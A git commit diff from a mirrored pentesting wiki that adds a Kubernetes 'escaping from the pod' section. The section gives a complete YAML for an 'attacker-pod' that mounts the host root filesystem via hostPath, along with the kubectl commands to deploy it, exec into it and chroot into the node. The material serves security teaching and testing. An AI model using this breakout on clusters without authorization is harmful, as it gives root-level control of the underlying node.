mirror of
https://github.com/carlospolop/hacktricks.git
synced 2023-12-14 19:12:55 +01:00
Kubernetes: escaping a pod
This commit is contained in:
parent
fb5375d3ad
commit
2697a28fce
|
@ -259,6 +259,69 @@ https://<Kubernetes_API_IP>:<port>/apis/extensions/v1beta1/namespaces/default/da
|
|||
|
||||
{% page-ref page="../../linux-unix/privilege-escalation/docker-breakout.md" %}
|
||||
|
||||
### Escaping from the pod
|
||||
|
||||
If you are able to create new pods you might be able to escape from them to the node. In order to do so you need to create a new pod using a yaml file, switch to the created pod and then chroot into the node's system. You can use already existing pods as reference for the yaml file since they display existing images and pathes.
|
||||
|
||||
```bash
|
||||
kubectl get pod <name> [-n <namespace>] -o yaml
|
||||
|
||||
```
|
||||
|
||||
Then you create your attack.yaml file
|
||||
|
||||
|
||||
```yaml
|
||||
apiVersion: v1
|
||||
kind: Pod
|
||||
metadata:
|
||||
labels:
|
||||
run: attacker-pod
|
||||
name: attacker-pod
|
||||
namespace: default
|
||||
spec:
|
||||
volumes:
|
||||
- name: host-fs
|
||||
hostPath:
|
||||
path: /
|
||||
containers:
|
||||
- image: ubuntu
|
||||
imagePullPolicy: Always
|
||||
name: attacker-pod
|
||||
volumeMounts:
|
||||
- name: host-fs
|
||||
mountPath: /root
|
||||
restartPolicy: Never
|
||||
|
||||
```
|
||||
[Original source](https://gist.github.com/abhisek/1909452a8ab9b8383a2e94f95ab0ccba)
|
||||
|
||||
After that you create the pod
|
||||
|
||||
```bash
|
||||
kubectl apply -f attacker.yaml [-n <namespace>]
|
||||
|
||||
```
|
||||
|
||||
Now you can switch to the created pod as follows
|
||||
|
||||
```bash
|
||||
kubectl exec -it attacker-pod [-n <namespace>] -- bash # attacker-pod is the name defined in the yaml file
|
||||
|
||||
```
|
||||
|
||||
And finally you chroot into the node's system
|
||||
|
||||
```bash
|
||||
chroot /root /bin/bash
|
||||
|
||||
```
|
||||
|
||||
Information obtained from:
|
||||
[Kubernetes Namespace Breakout using Insecure Host Path Volume — Part 1](https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216)
|
||||
[Attacking and Defending Kubernetes: Bust-A-Kube – Episode 1](https://www.inguardians.com/attacking-and-defending-kubernetes-bust-a-kube-episode-1/)
|
||||
|
||||
|
||||
## Sniffing
|
||||
|
||||
By default there isn't any encryption in the communication between pods .Mutual authentication, two-way, pod to pod.
|
||||
|
|
Loading…
Reference in a new issue